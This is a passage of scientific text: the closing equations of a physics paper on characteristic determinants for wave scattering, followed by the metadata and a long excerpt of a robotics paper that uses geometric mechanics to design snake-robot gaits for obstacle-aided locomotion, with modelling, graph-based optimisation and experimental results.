\[D_{N}^{0}=\prod_{l=1}^{N}\frac{1}{(1+r_{l+1,l})}\det D_{l,n}^{N}, \tag{21}\] with the following matrix elements \(D_{l,n}^{N}\): \[D_{l,n}^{N}=\left\{\begin{array}{ll}\delta_{ln}+(1-\delta_{ln})r_{l,l-1}e^{ ik_{l}|x_{l}-x_{n}|},&l\geq n,\\ \delta_{ln}+(1-\delta_{ln})r_{l-1,l}e^{ik_{l}|x_{l}-x_{n}|},&n\geq l.\end{array}\right. \tag{22}\] The characteristic determinant \(D_{N}\) can be presented as a determinant of a Teoplitz tridiagonal matrix that satisfies the following recurrence relationship: \[D_{N}=A_{N}D_{N-1}-B_{N}D_{N-2},\] where \(D_{N-1}\) (\(D_{N-2}\)) is the determinant equation (111) with the \(Nth\) and also the \((N-1)th\) row and column omitted. The initial conditions for the recurrence relations are \(D_{0}=1\), \(D_{-1}=0\), \(D_{1}\equiv A_{1}=1\). The coefficients \(A_{N}\), \(B_{N}\) can be obtained from the explicit form of \(D_{n,l}^{N}\) (see Eq. (111)). For \(N>1\) we have \[A_{n}=1+\frac{r_{n,n+1}}{r_{n-1,n}}(1+r_{n-1,n}+r_{n,n-1})e^{2ik_{n}|x_{n}-x_{n- 1}|}=1+B_{n}-r_{n,n-1}r_{n,n+1}e^{2ik_{n}|x_{n}-x_{n-1}|}\] and \[B_{n}=\frac{r_{n,n+1}}{r_{n-1,n}}(1+r_{n,n-1})(1+r_{n-1,n})e^{2ik_{n}|x_{n}-x_ {n-1}|}\] In concluding, let us stress once more that Eqs.(110) and (111) may be viewed as generalization of the characteristic determinant method that can be applied to the Helmholtz (Shrodinger) equation with complex potentials, distributed arbitrary and find scattering matrix elements without actually determining the photon (electron) eigenfunctions.
2302.06561
Gait design for limbless obstacle aided locomotion using geometric mechanics
Limbless robots have the potential to maneuver through cluttered environments that conventional robots cannot traverse. As illustrated in their biological counterparts such as snakes and nematodes, limbless locomotors can benefit from interactions with obstacles, yet such obstacle-aided locomotion (OAL) requires properly coordinated high-level self-deformation patterns (gait templates) as well as low-level body adaptation to environments. Most prior work on OAL utilized stereotyped traveling-wave gait templates and relied on local body deformations (e.g., passive body mechanics or decentralized controller parameter adaptation based on force feedback) for obstacle navigation, while gait template design for OAL remains less studied. In this paper, we explore novel gait templates for OAL based on tools derived from geometric mechanics (GM), which thus far has been limited to homogeneous environments. Here, we expand the scope of GM to obstacle-rich environments. Specifically, we establish a model that maps the presence of an obstacle to directional constraints in optimization. In doing so, we identify novel gait templates suitable for sparsely and densely distributed obstacle-rich environments respectively. Open-loop robophysical experiments verify the effectiveness of our identified OAL gaits in obstacle-rich environments. We posit that when such OAL gait templates are augmented with appropriate sensing and feedback controls, limbless locomotors will gain robust function in obstacle rich environments.
Baxi Chong, Tianyu Wang, Daniel Irvine, Velin Kojouharov, Bo Lin, Howie Choset, Daniel I. Goldman, Grigoriy Blekherman
2023-02-13T18:06:06Z
http://arxiv.org/abs/2302.06561v1
# Gait design for limbless obstacle aided locomotion using geometric mechanics ###### Abstract Limbless robots have the potential to maneuver through cluttered environments that conventional robots cannot traverse. As illustrated in their biological counterparts such as snakes and nematodes, limbless locomotors can benefit from interactions with obstacles, yet such obstacle-aided locomotion (OAL) requires properly coordinated high-level self-deformation patterns (gait templates) as well as low-level body adaptation to environments. Most prior work on OAL utilized stereotyped traveling-wave gait templates and relied on local body deformations (e.g., passive body mechanics or decentralized controller parameter adaptation based on force feedback) for obstacle navigation, while gait template design for OAL remains less studied. In this paper, we explore novel gait templates for OAL based on tools derived from geometric mechanics (GM), which thus far has been limited to homogeneous environments. Here, we expand the scope of GM to obstacle-rich environments. Specifically, we establish a model that maps the presence of an obstacle to directional constraints in optimization. In doing so, we identify novel gait templates suitable for sparsely and densely distributed obstacle-rich environments respectively. Open-loop robophysical experiments verify the effectiveness of our identified OAL gaits in obstacle-rich environments. We posit that when such OAL gait templates are augmented with appropriate sensing and feedback controls, limbless locomotors will gain robust function in obstacle rich environments. ## I Introduction Elongate limbless locomotors have advantages in navigating cluttered and confined spaces. For instance, adaptation to cluttered environments is believed to be a source of evolutionary pressure for limblessness in Squamates (lizards and snakes) [30, 35]. In order to move through such cluttered environments, these animals had evolved the capability to push off their surroundings to locomote. This is commonly known as obstacle-aided locomotion (OAL) [19, 23, 17]. Moreover, many biological limbless locomotors can have higher speeds with OAL than in obstacle-free environments [23, 17] while legged locomotors often slow down as heterogeneity increases [36, 7, 28, 10]. Unfortunately, it is still challenging for elongated limbless robots to approach the performance of their biological counterparts displayed in OAL. To replicate the successful biological OAL in robotic/artificial counterparts, prior work has considered OAL in robotic applications. Transeth et al. [37] built physical models of robot-obstacle interactions, and made quantitative predictions of robot locomotion in obstacle-rich environments. Liljeback et al. [19] noted that the interactions between robots and obstacles are only useful when the force from the obstacle to robots aligns with the desired direction of motion. Specifically the "beneficial obstacle" and "detrimental obstacle" are distinguished based on their configuration relative to the robot. Recently, compliant control (shape-based compliance) was also introduced to improve the performance of limbless robots among obstacles [38, 40, 41]. As suggested in prior work, gait template design1 is crucial to the performance of limbless locomotors [11, 25, 6]. Appropriate gait templates can greatly simplify the control/adaptation of robots especially in heterogeneous environments [9, 16, 27, 2, 6]. Most limbless robots use traveling-wave gait templates for locomotion where sinusoidal oscillation of body joint bending propagates from head to tail under constant amplitude (i.e., phase modulation) [15, 8, 32]. To the best of our knowledge, most OAL work has focused on force-feedback decentralized adaptation of traveling-wave gait templates to interact with obstacles, where the choices of gait templates are often pre Fig. 1: **A robophysical and theoretical model of obstacle aided locomotion** (a) Top view of the robophysical model navigating among multiple obstacles. (b) The theoretical model for obstacle aided locomotion with (_left_) a single obstacle and (_right_) multiple obstacles. determined [19, 38, 40]. In other words, there is a lack of gait templates designed (other than traveling-wave) specifically for obstacle aided locomotion. Geometric mechanics (GM) is a framework for gait design. GM was developed to study swimming in obstacle-free low Reynolds number fluids [29, 43]. Recent work has shown that GM can also offer insights in gait design in terrestrial contexts (e.g., granular media and frictional ground) where frictional forces dominate over inertial forces [4, 6]. In GM the motion of a locomotion system is separated into a shape space (the internal joint angle space) and a position space (position and orientation of locomotor in the world frame). By establishing the mapping between velocities in shape and position spaces, GM offers tools that allow us to visually analyze, design and optimize gaits [14]. Although GM has produced a number of highly effective gait templates, prior work in GM has been limited to obstacle-free environments. In this paper, we seek to expand the scope of GM to obstacle-rich2 environments. Challenges of extending GM to design gait templates in heterogeneous environments include but are not limited to (1) modeling the interaction between obstacle and robot, (2) mapping the presence of obstacle from position space to constraints in shape space, and (3) identifying whether the obstacle (at a given position relative to the robot) is beneficial. We establish a new physical robot-obstacle interaction model integrating the presence of an obstacle into the GM framework. In doing so, we then convert the gait design problem into a discrete optimization problem in graphs. As a result, we identify elliptical gait templates which combine both amplitude modulation and phase modulation, specialized for navigating sparsely-distributed obstacle-rich environments. Further, we confirm that traveling-wave gait templates are specialized for densely-distributed obstacle-rich environments, which is consistent with prior works [19, 38]. We verify our results using a robophysical model (Fig. 1). Footnote 2: Here, we consider obstacles as vertical posts randomly distributed on flat terrains. ## II Geometric mechanics In this subsection, we provide an overview of the geometric tools that undergird the analysis framework introduced in this paper. For a more detailed and comprehensive review, we refer readers to [3, 12, 24, 45]. ### _Kinematic Reconstruction Equation_ In systems where inertial effects are negligible, the equations of motion ([24]) can be approximated as: \[\mathbf{\xi}=\mathbf{A}_{r}(\mathbf{r})\dot{\mathbf{r}}, \tag{1}\] where \(\mathbf{\xi}=[\xi_{x},\xi_{y},\xi_{\theta}]\) denotes the body velocity in the forward, lateral, and rotational directions; \(\mathbf{r}\) denotes the internal shape variables (joint angles); \(\mathbf{A}_{r}(\mathbf{r})\) is the local connection matrix, which encodes environmental constraints and the conservation of momentum. The analysis and visualization power of geometric mechanics is particularly effective when the shape variable is 2-dimensional, i.e., \(\mathbf{r}\in\mathbb{R}^{2}\). In the applications where there are more than 2 joints (e.g. \(N\) degrees-of-freedom), we use two shape basis functions [11] to reduce the dimensionality of the system: \[\mathbf{r}=[\mathbf{\beta}_{1},\ \mathbf{\beta}_{2}]\,\mathbf{w},\ \ \mathbf{\xi}=\mathbf{A}_{r} \big{(}\mathbf{r}(\mathbf{w})\big{)}\dot{\mathbf{w}}=\mathbf{A}(\mathbf{w})\dot{\mathbf{w}} \tag{2}\] where \(\mathbf{\beta}_{1},\ \mathbf{\beta}_{2}\in\mathbb{R}^{N}\) are shape basis functions, \(\mathbf{w}\in\mathbb{R}^{2}\) is the reduced shape variable, and \(\mathbf{A}\) is the local connection matrix expressed with respect to reduced shape variables. In applications to limbless robots with \(N\) joints, the shape basis functions are often chosen to be: \[\mathbf{\beta}_{1}(i)=\sin\bigg{(}2\pi f_{s}\frac{i}{N-1}\bigg{)},\ \ \mathbf{\beta}_{2}(i)=\cos\bigg{(}2\pi f_{s}\frac{i}{N-1}\bigg{)} \tag{3}\] where \(f_{s}\) is the number of spatial waves, \(i\) denotes the joint index. ### _Numerical Derivation of the Local Connection Matrix_ The local connection matrix \(\mathbf{A}\) can be numerically derived using resistive force theory (RFT) to model the ground reaction force [18, 34, 44]. Specifically, the ground reaction force (GRF) experienced by the locomotor is the sum of the GRF experienced by each body segment. RFT decomposes the GRF experienced by a body segment of a locomotor into two components: \(\mathbf{F}_{\parallel}\) and \(\mathbf{F}_{\perp}\), reaction force along the direction parallel and perpendicular to the body segment respectively. From geometry and physics of GRF, reaction forces of each segment can be calculated from the body velocity \(\mathbf{\xi}\), reduced body shape \(\mathbf{w}\), and reduced shape velocity \(\dot{\mathbf{w}}\)[31, 26]. Fig. 2: **Forward velocity integral and Lie bracket effect** From left to right: the shape space, the height function (\(-\mathbf{dA}+[\mathbf{A_{1}},\ \mathbf{A_{2}}]\), and the forward velocity integral (\(-\mathbf{dA}\)). We compared two wave numbers: (a) \(f_{s}=1\) and (b) \(f_{g}=0.5\). In both cases, the height function has zero values over the shape space. Notably, for \(f_{s}=1\), neither forward velocity integral nor Lie bracket effect has significant contributions to forward displacement. In contrast, when \(f_{s}=0.5\), the forward velocity integral and Lie bracket effect have non-negligible, opposite contribute to forward displacement. The color bar scale asels labeling are identical in all panels. Assuming quasi-static motion, we consider the total net force applied to the system is zero at any instant in time: \[\mathbf{F}=\sum_{i=1}^{N}\left[\mathbf{F}_{\parallel}^{i}(\mathbf{\xi},\mathbf{w},\dot{\mathbf{w}})+ \mathbf{F}_{\perp}^{i}\left(\mathbf{\xi},\mathbf{w},\dot{\mathbf{w}}\right)\right]=0. \tag{4}\] At a given body shape \(\mathbf{w}\), Eq.(4) connects the shape velocity \(\dot{\mathbf{w}}\) to the body velocity \(\mathbf{\xi}\). Therefore, by the implicit function theorem and the linearization process, we can numerically derive the local connection matrix \(\mathbf{A}(\mathbf{w})\). In our implementation, we compute the solution of Eq.(4) using the MATLAB function _fsolve_. ### _Connection Vector Fields and Height Functions_ Each row of the local connection matrix \(\mathbf{A}\) corresponds to a component direction of the body velocity. Each row of the local connection matrix, over the shape space, then forms a connection vector field. In this way, the body velocities in the forward, lateral, and rotational directions are computed as the dot product of connection vector fields and the reduced shape velocity \(\dot{\mathbf{w}}\). The displacement along the gait path \(\partial\phi\) can be obtained by integrating the ordinary differential equation below [13]: \[g(T)=\int_{\partial\phi}T_{e}L_{g(\mathbf{w})}\mathbf{A}(\mathbf{w})\mathrm{d}\mathbf{w}, \tag{5}\] where \(g(\mathbf{w})=[x(\mathbf{w}),y(\mathbf{w}),\alpha(\mathbf{w})]\) represents the position and rotation of the body frame viewed in the world frame at position \(\mathbf{w}\); \(T\) is the time period of a gait cycle; and \(T_{e}L_{g}\) is the differential at the identity of the left multiplication map \(L_{g}\colon SE(2)\to SE(2)\), i.e. \[T_{e}L_{g}=\begin{bmatrix}\cos(\alpha)&-\sin(\alpha)&0\\ \sin(\alpha)&\cos(\alpha)&0\\ 0&0&1\end{bmatrix}.\] The group element \(g=(x,y,\theta)\in\mathrm{SE}(2)\) represents the position and rotation of the center of mass of the robot. Hence \(g(T)=[\Delta x,\Delta y,\Delta\theta]\) computes the translation and rotation of the body frame (w.r.t. the world frame) in one gait cycle. The forward velocity integral can therefore provide a first-order approximation to Eq. 5: \[\begin{split}\Delta x\\ \Delta y\\ \Delta\theta\end{bmatrix}\approx\int_{\partial\phi}\mathbf{A}(\mathbf{w}) \mathrm{d}\mathbf{w}=\int_{\partial\phi}\begin{bmatrix}\mathbf{A}^{x}(\mathbf{w})\\ \mathbf{A}^{y}(\mathbf{w})\\ \mathbf{A}^{\theta}(\mathbf{w})\end{bmatrix}\mathrm{d}\mathbf{w}, \tag{6}\] where \(\mathbf{A}^{x},\mathbf{A}^{y},\mathbf{A}^{\theta}\) are the three rows of the local connections respectively. According to Stokes' Theorem, the line integral along a closed curve \(\partial\phi\) is equal to the surface integral of the curl of \(\mathbf{A}(\mathbf{w})\) over the surface enclosed by \(\partial\phi\): \[\int_{\partial\phi}\mathbf{A}(\mathbf{w})\mathrm{d}\mathbf{w}=\iint_{\phi}-\mathrm{d}\mathbf{ A}(\mathbf{w})\mathrm{d}\mathbf{w}_{1}\mathrm{d}\mathbf{w}_{2}, \tag{7}\] where \(\phi\) denotes the surface enclosed by \(\partial\phi\), \(-\mathrm{d}\mathbf{A}(\mathbf{w})\) denotes the curl of the connection vector field. Note that in the simplification from Eq. 5 to Eq. 6, the forward displacement is approximated by the direct integration of forward speed. In reality, the combination of lateral and rotational velocities can lead to net translation in the forward direction. For example, car undergoing parallel parking will have zero instantaneous lateral velocity but can have finite lateral displacement with properly sequenced forward and rotational velocity. Such effect is known as Lie bracket effect [13] and is neglected in Eq. 5. The first order of Lie bracket effect can be compensated for by introducing a Lie bracket correction term [13]. Higher order Lie bracket effects can be minimized by properly choosing the body frame [22]. With the Lie bracket correction term, we can better approximate the net forward displacement [13]: \[g(T)=\iint_{\phi}\left(\underbrace{-\mathrm{d}\mathbf{A}(\mathbf{w})+\left[\mathbf{A_{1} },\ \mathbf{A_{2}}\right]}_{D\mathbf{A}(\mathbf{w})}\right)\,\mathrm{d}w_{1}\mathrm{d}w_{2} \tag{8}\] The three rows of \(D\mathbf{A}(\mathbf{w})\) can thus produce three height functions in the forward, lateral, and rotational directions respectively. ### _Lie bracket effect for OAL_ Limbless locomotors have limited mobility on hard ground [20, 5, 1]. From a geometric perspective, we posit that some symmetry exists to limit the mobility of limbless locomotion on hard ground. The presence of obstacles can break such symmetry and therefore facilitate effective locomotion. To explore such symmetry breaking, in Fig. 2, we compared the height function for limbless robot with different shape basis functions (\(f_{s}=\{1,\ 0.5\}\) in Eq. 3). In both cases, the height function \(D\mathbf{A}(\mathbf{w})\) is almost constantly zero over the entire shape space, indicating that the robot has almost negligible speed regardless of the choice of gait (Fig. 2). When we Fig. 3: **Lie bracket effect** (a) Theoretical prediction of forward velocity integral by calculating the Frobenius Norm of \(\mathbf{A}(\mathbf{w})\) for a range of spatial frequencies (\(f_{s}\)). (b) Experimental verification. We used a pair of smooth parallel walls to restrict the robot’s body velocity only in forward direction. We tested the locomotion performance for gaits with different spatial frequencies. Backwards locomotion is observed with its peak at \(f_{s}=0.5\), which is consistent with our theoretical predictions. look carefully at different components of the height function, we notice that robots with 1 wave (\(f_{s}=1\)) and 0.5 waves (\(f_{s}=0.5\)) exhibit distinct properties. On the one hand, for the robot with 1 wave, neither the forward velocity integral nor the Lie bracket effect can lead to significant translation (Fig. 2.a). On the other hand, for the robot with 0.5 waves, the forward velocity integral and the Lie bracket effect have the same magnitude but opposite direction contribution to locomotion (Fig. 2.b). This observation indicates lateral forces (likely from obstacles) can also contribute to forward velocities when the limbless locomotor is operating at appropriate spatial wave numbers \(f_{s}\). To determine the \(f_{s}\) that can benefit the most from lateral forces, we calculated the Frobenius norm3 of \(\mathbf{dA}(\mathbf{w})\) for a range of wave numbers (Fig. 3). From the geometric analysis, we predict that wave number \(\approx\) 0.5 will have the highest possibility to benefit from lateral forces, and specialized in OAL. Footnote 3: We chose Frobenius norm to approximate the magnitude of the vector field ## III Modeling Interaction with One Obstacle ### _Geometric Model_ In the previous section, we introduced a derivation of the local connection vector field in homogeneous environments. In heterogeneous environments, the interactions with obstacles can often lead to changes in force and torque balance, and thus changes in the connection vector field. In this section, we establish a new method to numerically calculate the connection vector field, respecting the interactions between the robot and obstacles in its environment. Note that to simplify our analysis, we assume that the friction between the robot and the obstacle is negligible [19]. Consider one obstacle in contact with the robot. Index \(i_{0}\) denotes the link of contact. We further assume that \(i_{0}\) does not change in each obstacle-interaction instance. This assumption is later justified in robot experiments. For simplicity, our analysis below assumes that the obstacle resides on the left hand side (LHS) of link \(i_{0}\). The analysis for the right hand side (RHS) obstacle will be symmetric to our analysis below. Existence of the obstacle will restrict the lateral body velocity \(\xi_{y}\geq 0\). In this way, there are two mutually exclusive conditions for the lateral body velocity: #### Iii-A1 \(\xi_{y}=0\) In this case, the robot will remain in contact with the obstacle. If we assume that the friction between the robot and the obstacle is negligible, then the net force from obstacle to robot (\(F\)) will align with the lateral direction (\(y^{\prime}_{i}\)) of the body frame in link \(i_{0}\). In the body frame of link \(i_{0}\), the interaction between the obstacle and the robot only contributes in the lateral direction. In other words, the force and torque balance in forward and rotational directions are independent from the interactions with obstacles. In this way, we can rewrite Eq. 4 into: \[\mathbf{F}=\sum_{i}\left(\mathbf{F}^{i}_{||}\begin{pmatrix}\xi_{x}\\ 0\\ \xi_{\theta}\end{pmatrix},\mathbf{w},\dot{\mathbf{w}})+\mathbf{F}^{i}_{\perp}\begin{pmatrix} \xi_{x}\\ 0\\ \xi_{\theta}\end{pmatrix},\mathbf{w},\dot{\mathbf{w}})\right)=\begin{pmatrix}0\\ F\\ 0\end{pmatrix}. \tag{9}\] In Eq. 9, there are two variables and two equality constraints, allowing us to determine the local connection vector field. #### Iii-A2 \(\xi_{y}>0\) In this case, the robot will leave the obstacle. In this way, original force and torque balance in Eq. 4 are still valid to determine the local connection vector field. ### _Inequality Constraints_ With the two mutually exclusive interactions conditions, it is thus important to establish a criterion to evaluate the direction of \(\xi_{y}\). We first explore the conditions where the robot leaves the obstacle. Specifically, from the equation of motion (Eq. 2), the lateral velocity \(\xi_{y}\) can be approximated by: \[\xi_{y}=\mathbf{A}_{y}(\mathbf{w})\dot{\mathbf{w}}, \tag{10}\] where \(\mathbf{A}_{y}(\mathbf{w})\) is the second row of the local connection matrix \(\mathbf{A}(\mathbf{w})\). On the one hand, if \(\mathbf{A}_{y}(\mathbf{w})\dot{\mathbf{w}}>0\), the robot will leave the Fig. 4: **Modeling interactions between robot and obstacles** (i) (_Left_) The vector field \(V_{1}\) assuming the obstacle has interactions with the head link (\(i_{0}=1\)). (_Right_) Force relationship illustrations for interactions between robot and obstacle. (ii) (_Left_) The vector field \(V_{2}\) assuming the obstacle has interactions with the head link (\(i_{0}=1\)). (_Right_) The two conditions in Sec. III. (iii) OAL with multiple obstacles. Three conditions are compared. Note that in condition (c), obstacles constrain the lateral and rotational oscillation of robot’s central body axis (blue arrow). obstacle, which is consistent with our assumed condition. In this case, Eq. 10 is valid in accordance with Eq. 4, where we use condition (2) to determine the local connection matrix. On the other hand, if \(\mathbf{A}_{y}(\mathbf{w})\dot{\mathbf{w}}\leq 0\), the robot will keep engaging with the obstacle, which contradicts our assumption. In this case, Eq. 10 is not valid, and we will use Eq. 9 and condition (1) to determine local connection matrix. ### _Gait Design_ With the above model, we can now design gaits for limbless robots in obstacle-rich environments. With the optimal gait, the robot should take the best advantage of each obstacle-interaction and leave the obstacle only when necessary. Consider the joint angle limit being \(\theta_{m}\) (\(w_{1},w_{2}\in[-\theta_{m},\theta_{m}]\). Let \(\Phi=\{\phi:[0,T]\rightarrow[-\theta,\theta]\times[-\theta,\theta]\}\) be the collection of all paths in the shape space; let \(V_{1}\) be the local connection vector field generated from condition 1 (Eq. 9); and \(V_{2}=\mathbf{A}_{y}(\mathbf{w})\). The gait optimization problem becomes a line integral subject to direction constraints: **Problem 1**.: _Find the path \(\phi\in\Phi\), subject to: \(\frac{d\phi(t)}{dt}\cdot V_{2}\Big{(}\phi(t)\big{)}>0\ \forall\ t\in[0,T]\), such that \(\int_{0}^{T}\frac{d\phi(t)}{dt}\cdot V_{1}\Big{(}\phi(t)\Big{)}\mathrm{d}t\) is maximized._ Assuming \(i_{0}=1\), we showed an example of \(V_{1}\) and \(V_{2}\) in Fig. 4. ### _Numerical Optimization_ In practice, we discretize the shape space into a \((n+1)\times(n+1)\) lattice grid, where \(n\) is a suitable positive integer. The values of \(V_{1}\) and \(V_{2}\) are then numerically calculated at the grid points: \(V_{i}(x,y)=\left[V_{i,1}(x,y),V_{i,2}(x,y)\right]\) where \(i=1,2\) and \((x,y)\) is a discretized element in the shape space. We optimize \(\phi\) among lattice paths with horizontal and vertical line segments. \(V_{2}\) is one part of the vector fields for locomotion in isotropic environment; thus it is reasonable to assume that \(V_{2}\) is a conservative vector field [20, 5, 1]. Then we can compute a potential function \(P(x,y)\) defined on the shape space such that \(V_{2}\) is the gradient of \(P(x,y)\). We consider a weighted directed graph \(G=(U,A)\), where the set of vertices \(U\) consists of the \((n+1)\times(n+1)\) lattice points4. In this way, at each vertex \(u=(x,y)\in U\), there are 4 adjacent vertices: \(\{(x\pm 1,y),(x,y\pm 1)\}\). The arcs are constructed in the following way: Footnote 4: We chose the letter \(U\) (instead of \(V\)) to represent collections of vertices to avoid notation confusion with \(V_{1,2}\) as in vector fields. _i) :_ If \(P(x+1,y)>P(x,y)\), then we add an arc from \((x,y)\) to \((x+1,y)\) with weight \(V_{1,1}(x,y)\) to \(A\); _j) :_ If \(P(x-1,y)>P(x,y)\), then we add an arc from \((x,y)\) to \((x-1,y)\) with weight \(V_{1,1}(x,y)\) to \(A\); _j) :_ If \(P(x,y+1)>P(x,y)\), then we add an arc from \((x,y)\) to \((x,y+1)\) with weight \(V_{1,2}(x,y)\) to \(A\); _d) :_ If \(P(x,y-1)>P(x,y)\), then we add an arc from \((x,y)\) to \((x,y-1)\) with weight \(V_{1,2}(x,y)\) to \(A\); Thus, the existence of an arc \(a_{ij}\in A\) (from vertex \(u_{i}\) to \(u_{j}\), \(u_{i},u_{j}\in U\)) indicates that the move from \(u_{i}\) to \(u_{j}\) has positive dot product in \(V_{2}\). The weight of \(a_{ij}\) denotes the line integral from \(u_{i}\) to \(u_{j}\) along \(V_{1}\). **Lemma 2**.: \(G\) _is a directed acyclic graph (DAG)._ Proof:: Let \(C\) be a directed cycle in \(G\). From our previous assumptions, every arc in \(C\) has positive dot product in \(V_{2}\). Thus, the sum of all dot product of arcs in \(C\) and \(V_{2}\) must be strictly positive. This indicates that there exists a path in a conservative vector field (\(V_{2}\)) with positive strictly line integral, which violates our assumption. Therefore, there is no directed cycle in \(G\). With the aforementioned notation, a discretized version of Problem 1 becomes **Problem 3**.: _Find a simple directed path in \(G=(U,A)\) with maximal weight._ It is well-known that Problem 3 in a DAG has a linear-time algorithm if the starting point is fixed [33, p. 661]. So we Fig. 5: **Identification of gait templates** (a) Collection of effective OAL gaits for (_top_) \(i_{0}=1\), (_mid_) \(i_{0}=2\), and (_bottom_) \(i_{0}=3\). We consider a gait to be effective if it can produce displacement greater than 0.1 BL (body length). Note that there is no effective gait for \(i_{0}=3\). We illustrate the optimal gait with \(D=0.05\) for \(i_{0}=3\). (b) Height function for OAL among densely-distributed obstacles. (c) Parameter variation. (_Top_) An illustration of ellipse eccentricity variation by manipulating \(\phi\). (_Bottom_) An illustration of ellipse orientation variation by manipulating \(\theta\). can run this algorithm once for each vertex in \(U\) to solve Problem 3. Since \(|U|=(n+1)^{2}\), our algorithm has time complexity \(O(n^{4})\). We implemented this algorithm in MATLAB and found optimal paths in our lattice grid. ### _Gait Identification_ From the algorithms introduced in Sec. III-D, we solve Problem 1 and identify the effective gait paths \(\phi_{LHS}\) with link of contact varying from 1 (head) to 3 (mid-body) in Fig. 5a. We define a gait path to be effective if it can cause net displacement greater than 0.1 body length (BL). Note that \(\phi_{LHS}\) (colored red) denotes gait paths designated for robot interacting with an obstacle on the left-hand-side. From symmetry, we can identify \(\phi_{RHS}\) with an obstacle on the right-hand-side (colored blue). Note that no gait path can lead to displacement higher than 0.1 BL when interacting with obstacles on mid-body links (\(i_{0}=3\)). In Fig. 5a (bottom), we illustrate the optimal gait path which causes displacement of 0.06 BL. From Fig. 5a, we notice that the number of effective gait paths decreases as the link of contact transitions from head to mid-body links. Further, the properly designed gait path can cause up to 0.35 BL (per cycle) when interacting with the head link; whereas it can only cause 0.12 and 0.06 BL when \(i_{0}\) changes to 2 and 3 respectively. Therefore, our results indicate that it is desired to interact with obstacles from head link rather than mid-body links. We further observe from Fig. 5a (top) that almost all effective gait paths emerge to be (at least a part of) elliptical paths. To quantify this observation, we fit the collection of effective gaits with an oriented ellipse. An ellipse with flatness (defined as the ratio of short-axis and long-axis) around 0.5 can reasonably fit effective gait paths. The ellipse oriented at angle of \(\pi/4\) with respect to the horizontal axis. ## IV Modeling Interaction with Multiple Obstacles Now we consider multiple obstacles in contact with the robot. Similar to our analysis before, there are three conditions with respect to the status of robot leaving/engaging obstacles: Robot only interacts with one obstacleIn this case, the robot will only remain contact with one of the obstacle. This condition is similar to condition (1) in Sec. III. Robot leaves all obstaclesIn this case, the robot will leave all obstacles, which is similar to condition (2) in Sec. III. Robot interacts with multiple obstaclesIn this case, the robot will remain contact with more multiple obstacles. As illustrated in Fig. 4c, the presence of multiple obstacles restricts the lateral oscillation and rotational oscillation of the central body axis on robot (assuming the friction is negligible [19]). The definition of central body axis frame can be found in [11, 31]. In other words, in the body reference frame of central body axis, we have: \[\mathbf{F}=\sum_{i}\left(\mathbf{F}_{1}^{i}(\begin{bmatrix}\xi_{x}\\ 0\\ 0\end{bmatrix},\mathbf{w},\hat{\mathbf{w}})+\mathbf{F}_{\perp}^{i}(\begin{bmatrix}\xi_{x} \\ 0\\ 0\end{bmatrix},\mathbf{w},\hat{\mathbf{w}})\right)=\begin{pmatrix}0\\ F_{y}\\ F_{\tau}\end{pmatrix}. \tag{11}\] In Eq. 11, there is only one variable and one equality constraint, allowing us to determine the local connection vector field. Note that the condition determination for when the robot is in contact with multiple obstacles can be challenging, which likely requires sensing and compliance as indicated in prior work [38, 21]. However, consider the case where the obstacles are so densely distributed that the robot will inevitably interact with multiple obstacles. In this case, we can simply assume that condition (c) is always valid and calculate the height functions to determine the optimal gaits. We illustrate the height function in Fig. 5.b. We notice that a traveling-wave gait path emerges as an optimal gait in environments with densely-packed obstacles. ## V Ropophysical model In robophysical experiments, we used a limbless robot composed of 11 identical alternative pitch-yaw arranged rotary joints using Dynamixel AX-12a motors. The gaits are executed by controlling the positions of joints to follow a sequence of joint angle commands. Note that for 2D in-plane motion, we only command odd (yaw) joints to move while the even (pitch) joint angles are held at zero. For each gait tested, we repeat the experiment at least six times. In each trial, we commanded the robot to execute three cycles of the gait. The motion of the robot is tracked by an OptiTrack motion capture system at a 120 FPS frequency with eight reflective markers affixed along the midline of the robot. Fig. 6: **Minimal obstacle spacing for effective OAL** Robot effective OAL gaits through interaction with an obstacle. However the translation (\(D=0.15\pm 0.03BL\)) is not sufficient to reach the next obstacle (spacing \(s\sim 0.5BL\)). Therefore, the robot will stuck at the gap between two obstacles. ## VI Results ### _Shape basis function optimization for OAL_ To verify our prediction on shape basis function for OAL, we conducted robophysical experiments using parallel walls. As shown in Fig. 3, the robot was confined between two parallel smooth walls with spacing 0.3 body length of the limbless robot. The interactions between the robot and the wall then restricted the velocity of the robot to the forward direction. Thus the average speed of the robot in parallel walls closely resembles the forward velocity integral from our geometric mechanics analysis. Interestingly, the robot has negative forward displacement, in agreement with the predictions from the forward velocity integral. Further, we noticed that highest backward speed occurs at \(f_{s}=0.5\), also in agreement with our theoretical predictions. Therefore, robophysical experiments verified our prediction that lateral forces can also contribute to forward velocities via Lie bracket effects. In most cases, the interaction between obstacles and the robot is predominantly in lateral directions [19]. We thus chose \(f_{s}=0.5\) in our later analysis. ### _Minimal obstacle spacing for effective OAL_ We investigate the minimal obstacle spacing for effective OAL. From our analysis in Sec. III, we predicted that with proper coordination, the interaction between a robot and a (single) obstacle can cause displacement up to 0.35 BL. Note that the number 0.35 is computed based on the robot morphology and our choice of shape basis function. In other words, there exists a upper bound on how much a single obstacle can contribute to robot OAL. If the obstacle spacing is greater than such a bound, the robot will be likely unable to reach the next surrounding obstacle. To verify our prediction, we tested robot OAL performance in obstacle-rich environments with spacing greater than 0.35 BL. We notice that while OAL gaits can cause some finite displacement through the interaction with the first obstacle, such translation is not sufficient to reach the next obstacle (Fig. 6 and SI video). In this way, the robot will get "stuck" in the gap between two obstacles. ### _OAL with sparsely distributed obstacles_ From our framework, we predicted that elliptical gaits can have the best performance among sparsely distributed obstacles. To test our prediction, we constructed a sparsely-distributed obstacle-rich environments. The obstacles are randomly positioned in the track (Fig. 7). We then conduct robophysical experiments and evaluate the OAL performance of various gaits. #### Vi-C1 Varying ellipse eccentricity We first test gaits with varying eccentricity. Specifically, prescribe the reduced shape variable by \(w_{1}(t)=w_{m}\sin{(\omega t)}\), \(w_{2}(t)=w_{m}\cos{(\omega t+\phi)}\), where \(\omega\) is the temporal frequency, \(w_{m}\) is the amplitude, and \(\phi\) controls the eccentricity. As illustrated in Fig. 5.c, varying \(\phi\) can facilitate the transition from standing wave (\(\phi=0\)) to traveling wave (\(\phi=\pi/2\)) in the shape space. In our theoretical analysis (Sec. III), we predict that \(\phi=\pi/4\) can have the best OAL performance. We test gaits with different \(\phi\) among sparsely-distributed obstacles. We notice that \(\phi=\pi/4\) indeed outperforms other gaits, including standing wave and traveling wave (Fig. 7). To explore the principle behind the advantage of the elliptical gaits, we measured the duration of obstacle-contact in these experiments. Here, we defined the duration of contact by the average fraction that the robot is interacting with obstacles \(\tau/T\), where \(\tau\) is empirically measured average 